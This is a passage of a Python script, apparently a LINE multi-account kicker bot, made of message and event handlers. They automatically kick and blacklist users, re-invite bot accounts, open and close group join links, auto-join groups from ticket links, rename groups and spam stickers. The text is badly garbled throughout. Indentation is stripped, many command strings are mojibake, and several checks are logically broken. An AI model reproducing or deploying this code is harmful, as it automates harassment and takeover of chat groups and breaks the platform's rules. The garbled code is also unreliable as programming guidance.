if op.type == 19:
if op.param3 in baby:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,baby)
cl.inviteIntoGroup(op.param1,[op.param3])
else:
pass
if op.type == 19:
if op.param3 in baby:
if op.param2 in baby:
cl.inviteIntoGroup(op.param1,baby)
cl.inviteIntoGroup(op.param1,[op.param3])
#------NOTIFIED_KICKOUT_FROM_GROUP-----------------
if op.type == 19:
if wait["autoKick"] == True:
if op.param2 in admin:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in admin:
pass
else:
wait["blacklist"][op.param2] = True
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in admin:
pass
else:
wait["blacklist"][op.param2] = True
#====================================================
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
#------------------NOTIFIED_KICKOUT_FROM_GROUP-----------------
if op.type == 19:
if op.param3 in admin or owner:
if op.param2 not in Bots:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
#================================================================
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
#-----------------------------------------
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
cl.sendText(msg.to,"deleted")
cl.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
cl.sendText(msg.to,"It is not in the black list")
cl.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already")
cl.sendText(msg.to,"already")
cl.sendText(msg.to,"already")
kc.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"aded")
cl.sendText(msg.to,"aded")
cl.sendText(msg.to,"aded")
kc.sendText(msg.to,"aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
cl.sendText(msg.to,"deleted")
cl.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
cl.sendText(msg.to,"It is not in the black list")
cl.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL�0�10��9�0�16�0�69�0�3�0�4\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["help","Help"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
#--------------------------------------------------
elif msg.text in ["Key1"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,translateMessage)
else:
cl.sendText(msg.to,helpt)
#--------------------------------------------------
elif msg.text in ["Key7"]:
if msg.from_ in admin or owner:
if wait["lang"] == "JP":
cl.sendText(msg.to,botMessage)
else:
cl.sendText(msg.to,helpt)
#--------------------------------------------------
elif msg.text in ["Key2"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,socmedMessage)
else:
cl.sendText(msg.to,helpt)
#--------------------------------------------------
elif msg.text in ["Key4"]:
if msg.from_ in admin or owner:
if wait["lang"] == "JP":
cl.sendText(msg.to,protectMessage)
else:
cl.sendText(msg.to,helpt)
#--------------------------------------------------
elif msg.text in ["Key5"]:
if msg.from_ in admin or owner:
if wait["lang"] == "JP":
cl.sendText(msg.to,settingMessage)
else:
cl.sendText(msg.to,helpt)
#--------------------------------------------------
elif msg.text in ["Key6"]:
if msg.from_ in admin or owner:
if wait["lang"] == "JP":
cl.sendText(msg.to,stealMessage)
else:
cl.sendText(msg.to,helpt)
#--------------------------------------------------
elif msg.text in ["Key3"]:
if msg.from_ in admin or owner:
if wait["lang"] == "JP":
cl.sendText(msg.to,giftMessage)
else:
cl.sendText(msg.to,helpt)
#--------------------------------------------------
elif ("Gn " in msg.text):
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
#--------------------------------------------------
elif ("Kr1 gn " in msg.text):
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Kr1 gn ","")
ki.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
#--------------------------------------------------
elif ("Kr2 gn " in msg.text):
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Kr2 gn ","")
kk.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
#--------------------------------------------------
elif ("Kr3 gn " in msg.text):
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Kr3 gn ","")
kc.updateGroup(X)
else:
kc.sendText(msg.to,"It can't be used besides the group.")
#--------------------------------------------------
elif "Kick " in msg.text:
if msg.from_ in admin or owner:
midd = msg.text.replace("Kick ","")
cl.kickoutFromGroup(msg.to,[midd])
#--------------------------------------------------
elif "Kr1 kick " in msg.text:
if msg.from_ in admin or owner:
midd = msg.text.replace("Kr1 kick ","")
ki.kickoutFromGroup(msg.to,[midd])
#--------------------------------------------------
elif "Kr2 kick " in msg.text:
if msg.from_ in admin or owner:
midd = msg.text.replace("Kr2 kick ","")
kk.kickoutFromGroup(msg.to,[midd])
#--------------------------------------------------
elif "Kr3 kick " in msg.text:
if msg.from_ in admin or owner:
midd = msg.text.replace("Kr3 kick ","")
kc.kickoutFromGroup(msg.to,[midd])
#--------------------------------------------------
elif "Invite " in msg.text:
if msg.from_ in admin or owner:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
#--------------------------------------------------
elif "Kr1 invite " in msg.text:
if msg.from_ in admin or owner:
midd = msg.text.replace("Kr1 invite ","")
ki.findAndAddContactsByMid(midd)
ki.inviteIntoGroup(msg.to,[midd])
#--------------------------------------------------
elif "Kr2 invite " in msg.text:
if msg.from_ in admin or owner:
midd = msg.text.replace("Kr2 invite ","")
kk.findAndAddContactsByMid(midd)
kk.inviteIntoGroup(msg.to,[midd])
#--------------------------------------------------
elif "Kr3 invite " in msg.text:
if msg.from_ in admin or owner:
midd = msg.text.replace("Kr3 invite ","")
kc.findAndAddContactsByMid(midd)
kc.inviteIntoGroup(msg.to,[midd])
#--------------------------------------------------
elif msg.text in ["Me"]:
if msg.from_ in admin or owner:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["K1"]:
if msg.from_ in admin or owner:
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["Kr2"]:
if msg.from_ in admin or owner:
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["cancel","Kr cancel"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
G = k3.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
k3.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
k3.sendText(msg.to,"No one is inviting")
else:
k3.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
k3.sendText(msg.to,"Can not be used outside the group")
else:
k3.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["Ourl","Link on","Urlon"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------
elif msg.text in ["Kr1 ourl","Kr1 link on"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
ki.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done Chivas")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------
elif msg.text in ["Kr2 ourl","Kr2 link on"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
kk.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done Chivas")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------
elif msg.text in ["Kr3 ourl","Kr3 link on"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = False
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Chivas")
else:
kc.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------
elif msg.text in ["Curl","Link off","Urloff"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------
elif msg.text in ["Kr1 curl","Kr1 link off"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done Chivas")
else:
cl.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------
elif msg.text in ["Kr2 curl","Kr2 link off"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
kk.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done Chivas")
else:
cl.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------
elif msg.text in ["Kr3 curl","Kr3 link off"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = True
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Chivas")
else:
kc.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------
elif "jointicket " in msg.text.lower():
rplace=msg.text.lower().replace("jointicket ")
if rplace == "on":
wait["atjointicket"]=True
elif rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.mid,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
#--------------------------------------------------
elif msg.text == "Ginfo":
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
u = "close"
else:
u = "open"
cl.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\nmembers:" + str(len(ginfo.members)) + "members\npending:" + sinvitee + "people\nURL:" + u + "it is inside")
else:
cl.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------
elif "Id" == msg.text:
if msg.from_ in admin or owner:
cl.sendText(msg.to,msg.to)
#--------------------------------------------------
elif "All mid" == msg.text:
if msg.from_ in admin or owner:
cl.sendText(msg.to,mid)
cl.sendText(msg.to,Amid)
cl.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
#--------------------------------------------------
elif "Mid" == msg.text:
if msg.from_ in admin or owner:
cl.sendText(msg.to,mid)
#--------------------------------------------------
elif "Kr1 mid" == msg.text:
if msg.from_ in admin or owner:
cl.sendText(msg.to,Amid)
#--------------------------------------------------
elif "Kr2 mid" == msg.text:
if msg.from_ in admin or owner:
cl.sendText(msg.to,Bmid)
#--------------------------------------------------
elif "Kr3 mid" == msg.text:
if msg.from_ in admin or owner:
kc.sendText(msg.to,Cmid)
#--------------------------------------------------
elif msg.text in ["Wkwk"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["Hehehe"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Galon"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["You"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["Hadeuh"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["Please"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["Haaa"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["Lol"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["Hmmm"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["Come"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["TL "]:
if msg.from_ in admin or owner:
tl_text = msg.text.replace("TL ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
#--------------------------------------------------
elif msg.text in ["Undang"]:
if msg.from_ in admin or owner:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
#--------------------------------------------------
elif msg.text in ["Kr1 rename "]:
if msg.from_ in admin or owner:
string = msg.text.replace("Cv1 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = ki.getProfile()
profile_B.displayName = string
ki.updateProfile(profile_B)
cl.sendText(msg.to,"name " + string + " done")
#--------------------------------------------------
elif msg.text in ["Kr2 rename "]:
if msg.from_ in admin or owner:
string = msg.text.replace("Cv2 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = kk.getProfile()
profile_B.displayName = string
kk.updateProfile(profile_B)
cl.sendText(msg.to,"name " + string + " done")
#--------------------------------------------------
elif msg.text in ["Mc "]:
if msg.from_ in admin or owner:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["Guest On","guest on"]:
if msg.from_ in admin or owner:
if wait["Protectguest"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Guest Stranger On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectguest"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Guest Stranger On")
else:
cl.sendText(msg.to,"done")
#--------------------------------------------------
elif msg.text in ["Guest Off","guest off"]:
if msg.from_ in admin or owner:
if wait["Protectguest"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Guest Stranger Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectguest"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Guest Stranger Off")
else:
cl.sendText(msg.to,"done")
#--------------------------------------------------
elif msg.text in ["連絡åâ�1�7�1�71¤7¦Ë 1�71¤7:オãÆ�1�7�Â�1�7�1�71¤7","K on","Contact on","顯示:éâ€�1�7�â�1�7�1�71¤7 1�71¤7"]:
if msg.from_ in admin or owner:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
#--------------------------------------------------
elif msg.text in ["連絡åâ�1�7�1�71¤7¦Ë 1�71¤7:オãÆ�1�7�â�1�7�1�71¤7 1�71¤7","K off","Contact off","顯示:éâ€�1�7�Å�1�7�1�71¤7"]:
if msg.from_ in admin or owner:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done ")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
#--------------------------------------------------
elif msg.text in ["自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã¥Ââ 1�71¤7šÃ¥Å 1�71¤7 :オãÆ�1�7�Â�1�7�1�71¤7","Join on","Auto join:on","自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã¥ÂÆ’Ã¥Å�1�7�1�71¤7 :éâ€�1�7�â�1�7�1�71¤7 1�71¤7"]:
if msg.from_ in admin or owner:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
#--------------------------------------------------
elif msg.text in ["自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã¥Ââ 1�71¤7šÃ¥Å 1�71¤7 :オãÆ�1�7�â�1�7�1�71¤7 1�71¤7","Join off","Auto join:off","自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã¥ÂÆ’Ã¥Å�1�7�1�71¤7 :éâ€�1�7�Å�1�7�1�71¤7"]:
if msg.from_ in admin or owner:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
#--------------------------------------------------
elif msg.text in ["Gcancel:"]:
if msg.from_ in admin or owner:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"å…³äºâ�1�7�1�71¤7 éâ 1�71¤7šâ‚¬Ã¨Â¯Â·Ã¦â€¹â 1�71¤7™Ã§Â»Âãâ�1�7�¬â€šÃ¨Â¦Âæâ 1�71¤7”¶å¼â�1�7�¬Ã¨Â¯Â·Ã¦Å�1�7�‡å®šäººæâ 1�71¤7¢Â°Ã¥Ââ 1�71¤7˜Ã©â‚¬Â1�7")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下çšâ�1�7�1�71¤7žÃ¥Â°Âç»â 1�71¤7žÃ§â 1�71¤7¨èâ 1�71¤7¡ÂªÃ¥Å ¨éâ 1�71¤7šâ‚¬Ã¨Â¯Â·Ã¦â€¹â 1�71¤7™Ã§Â»Â�1�7�1�71¤7")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
#--------------------------------------------------
elif msg.text in ["強制自åâ 1�71¤7¹â 1�71¤7¢Ã©â‚¬â�1�7�¬Ã¥â�1�7�1�71¤7¡Â 1�71¤7:オãÆ�1�7�Â�1�7�1�71¤7","Leave on","Auto leave:on","強制自åâ 1�71¤7¹â 1�71¤7¢Ã©â‚¬â�1�7�¬Ã¥â�1�7�1�71¤7¡ÂºÃ¯Â¼Å¡Ã©â 1�71¤7“â�1�7�1�71¤7 1�71¤7"]:
if msg.from_ in admin or owner:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦Â了å¼â�1�7�¬Ã£â�1�7�¬â�1�7�1�71¤7 1�71¤7")
#--------------------------------------------------
elif msg.text in ["強制自åâ 1�71¤7¹â 1�71¤7¢Ã©â‚¬â�1�7�¬Ã¥â�1�7�1�71¤7¡Â 1�71¤7:オãÆ�1�7�â�1�7�1�71¤7 1�71¤7","Leave off","Auto leave:off","強制自åâ 1�71¤7¹â 1�71¤7¢Ã©â‚¬â�1�7�¬Ã¥â�1�7�1�71¤7¡ÂºÃ¯Â¼Å¡Ã©â 1�71¤7”Å�1�7�1�71¤7"]:
if msg.from_ in admin or owner:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
#--------------------------------------------------
elif msg.text in ["å…±æÅ�1�7�â�1�7�1�71¤7 1�71¤7:オãÆ�1�7�Â�1�7�1�71¤7","Share on","Share on"]:
if msg.from_ in admin or owner:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦Â了å¼â�1�7�¬Ã£â�1�7�¬â�1�7�1�71¤7 1�71¤7")
#--------------------------------------------------
elif msg.text in ["å…±æÅ�1�7�â�1�7�1�71¤7 1�71¤7:オãÆ�1�7�â�1�7�1�71¤7 1�71¤7","Share off","Share off"]:
if msg.from_ in admin or owner:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦Â了åâ�1�7�1�71¤7¦Â³Ã¦â 1�71¤7“Âãâ�1�7�¬â€ 1�71¤7")
#--------------------------------------------------
elif msg.text in ["Set","Status"]:
if msg.from_ in admin or owner:
md = ""
if wait["contact"] == True: md+="[Mask] CONTACT : [✅]\n"
else: md+="[Mask] CONTACT : [❌]\n"
if wait["autoJoin"] == True: md+="[Mask] AUTOJOIN : [✅]\n"
else: md +="[Mask] AUTOJOIN : [❌]\n"
if wait["autoCancel"]["on"] == True:md+="[Mask] GROUP CANCEL :" + str(wait["autoCancel"]["members"]) + "\n"
else: md+="[Mask] GROUP CANCEL : [❌]\n"
if wait["leaveRoom"] == True: md+="[Mask] AUTOLEAVE : [✅]\n"
else: md+="[Mask] AUTOLEAVE : [❌]\n"
if wait["timeline"] == True: md+="[Mask] SHARE : [✅]\n"
else:md+="[Mask] SHARE : [❌]\n"
if wait["autoAdd"] == True: md+="[Mask] AUTOADD : [✅]\n"
else:md+="[Mask] AUTOADD : [❌]\n"
if wait["commentOn"] == True: md+="[Mask] COMMENT : [✅]\n"
